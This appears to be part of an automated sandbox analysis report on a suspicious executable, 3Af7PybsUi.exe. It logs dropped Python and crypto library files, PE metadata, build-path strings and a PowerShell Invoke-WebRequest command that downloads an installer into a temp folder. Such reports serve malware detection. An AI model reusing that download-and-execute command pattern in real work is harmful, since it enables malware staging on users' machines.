Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\mixins.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\proactor_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\protocols.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\queues.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\runners.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\selector_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\sslproto.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\staggered.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\streams.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\subprocess.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\taskgroups.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\tasks.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\threads.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\timeouts.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\transports.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\trsock.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\unix_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\windows_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\windows_utils.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncore.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\base64.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\bdb.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\bisect.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\bz2.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\calendar.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\cgi.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\cgitb.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\chunk.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\cmd.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\code.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\codecs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\codeop.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\collections\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\collections\abc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\colorsys.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\compileall.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\_base.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\process.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\thread.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\configparser.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\contextlib.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\contextvars.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\copy.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\copyreg.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\cProfile.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\crypt.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\csv.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\_aix.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\_endian.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\dyld.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\dylib.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\fetch_macholib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\fetch_macholib.bat
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\framework.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\README.ctypes
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\__main__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_anon.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_array_in_pointer.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_arrays.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_as_parameter.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_bitfields.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_buffers.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_bytes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_byteswap.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_callbacks.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_cast.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_cfuncs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_checkretval.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_delattr.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_errno.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_find.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_frombuffer.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_funcptr.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_functions.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_incomplete.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_init.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_internals.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_keeprefs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_libc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_loading.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_macholib.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_memfunctions.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_numbers.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_objects.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_parameters.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_pep3118.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_pickling.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_pointers.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_prototypes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_python_api.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_random_things.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_refcounts.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_repr.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_returnfuncptrs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_simplesubclasses.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_sizes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_slicing.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_stringptr.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_strings.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_struct_fields.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_structures.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_unaligned_structures.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_unicode.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_values.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_varsize_struct.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_win32.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_wintypes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\util.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\wintypes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\ascii.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\has_key.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\panel.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\textpad.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dataclasses.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\datetime.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\dumb.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\gnu.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\ndbm.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\decimal.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\difflib.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dis.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\_msvccompiler.py
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7f8381ad-2e42-4432-8de5-c7beebe1009f}Jump to behavior
Source: 3Af7PybsUi.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 3Af7PybsUi.exeStatic file information: File size 20072422 > 1048576
Source: 3Af7PybsUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 3Af7PybsUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 3Af7PybsUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 3Af7PybsUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 3Af7PybsUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 3Af7PybsUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 3Af7PybsUi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: 3Af7PybsUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1316082858.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\agent\_work\138\s\build\ship\x86\burn.pdb source: tmpaf99aaqq.exe, 00000008.00000000.1849984571.00000000000EB000.00000002.00000001.01000000.0000001B.sdmp, tmpaf99aaqq.exe, 00000009.00000000.1852928969.000000000089B000.00000002.00000001.01000000.0000001D.sdmp, python-3.11.0-amd64.exe, 0000000A.00000000.1866271426.000000000009B000.00000002.00000001.01000000.00000021.sdmp, python-3.11.0-amd64.exe, 00000017.00000000.2117506840.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000018.00000000.2120418916.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000019.00000000.2123701363.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000000.2198842671.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000002.2219594362.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001B.00000000.2202150381.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001C.00000000.2209475341.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001F.00000000.2220206160.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1315925117.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: 3Af7PybsUi.exe, 00000000.00000003.1315925117.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: 3Af7PybsUi.exe, 00000000.00000003.1316082858.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\agent\_work\138\s\build\ship\x86\burn.pdb/ source: tmpaf99aaqq.exe, 00000008.00000000.1849984571.00000000000EB000.00000002.00000001.01000000.0000001B.sdmp, tmpaf99aaqq.exe, 00000009.00000000.1852928969.000000000089B000.00000002.00000001.01000000.0000001D.sdmp, python-3.11.0-amd64.exe, 0000000A.00000000.1866271426.000000000009B000.00000002.00000001.01000000.00000021.sdmp, python-3.11.0-amd64.exe, 00000017.00000000.2117506840.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000018.00000000.2120418916.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000019.00000000.2123701363.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000000.2198842671.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000002.2219594362.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001B.00000000.2202150381.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001C.00000000.2209475341.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001F.00000000.2220206160.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp
Source: 3Af7PybsUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 3Af7PybsUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 3Af7PybsUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 3Af7PybsUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 3Af7PybsUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "Jump to behavior
Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
Source: mfc140u.dll.0.drStatic PE information: section name: .didat
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
Source: python312.dll.0.drStatic PE information: section name: PyRuntim
Source: tmpaf99aaqq.exe.4.drStatic PE information: section name: .wixburn
Source: tmpaf99aaqq.exe.8.drStatic PE information: section name: .wixburn
Source: PythonBA.dll.9.drStatic PE information: section name: .00cfg
Source: python-3.11.0-amd64.exe.9.drStatic PE information: section name: .wixburn
Source: python-3.11.0-amd64.exe0.9.drStatic PE information: section name: .wixburn
Source: pythonw.exe.21.drStatic PE information: section name: _RDATA
Source: python.exe.21.drStatic PE information: section name: _RDATA
Source: libssl-1_1.dll.21.drStatic PE information: section name: .00cfg
Source: libcrypto-1_1.dll.21.drStatic PE information: section name: .00cfg
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004AE916 push ecx; ret 23_2_004AE929
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\libssl-3.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\pywin32_system32\pythoncom312.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_socket.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_elementtree.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeFile created: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_msi.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\pywin32_system32\pywintypes312.dllJump to dropped file
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeFile created: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\PythonBA.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\Lib\venv\scripts\nt\python.exeJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\win32\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_bz2.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\_queue.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\DLLs\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65002\libcrypto-3.dllJump to dropped file
